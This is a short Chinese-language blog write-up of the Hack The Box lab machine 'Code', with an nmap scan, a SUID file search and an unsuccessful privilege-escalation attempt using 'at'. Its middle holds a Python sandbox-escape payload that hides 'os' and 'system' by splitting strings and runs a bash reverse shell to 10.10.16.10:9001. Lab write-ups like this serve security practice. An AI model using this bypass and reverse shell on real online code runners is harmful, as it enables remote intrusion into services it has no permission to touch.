HTB打靶记录-Code

信息收集

nmap -sV -sC -O 10.10.11.62

Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-05 14:41 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.11.62
Host is up (1.6s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
|   256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_  256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open  http    Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.50 seconds

访问http://10.10.11.62:5000/,是一个python在线运行器,简单测试发现做了敏感操作限制,于是通过原型链来获取os模块,

print(getattr(globals()['__spec__'].__init__.__globals__['sys'].modules['o''s'], 'sys''tem')("bash -c 'bash -i >& /dev/tcp/10.10.16.10/9001 0>&1'"))

成功拿到shell,cat ~/user.txt

提权

执行 find / -perm -u=s -type f 2>/dev/null

/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/umount
/usr/bin/at
/usr/bin/su
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chfn
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

at命令拥有suid权限,理论上是可以通过at设置计划任务来提权的,但是实践发现还是普通用户,不知所云,遂放弃,有懂的师傅教教我

posted @ 2025-04-06 13:16  F12~  阅读(164)  评论(0)    收藏  举报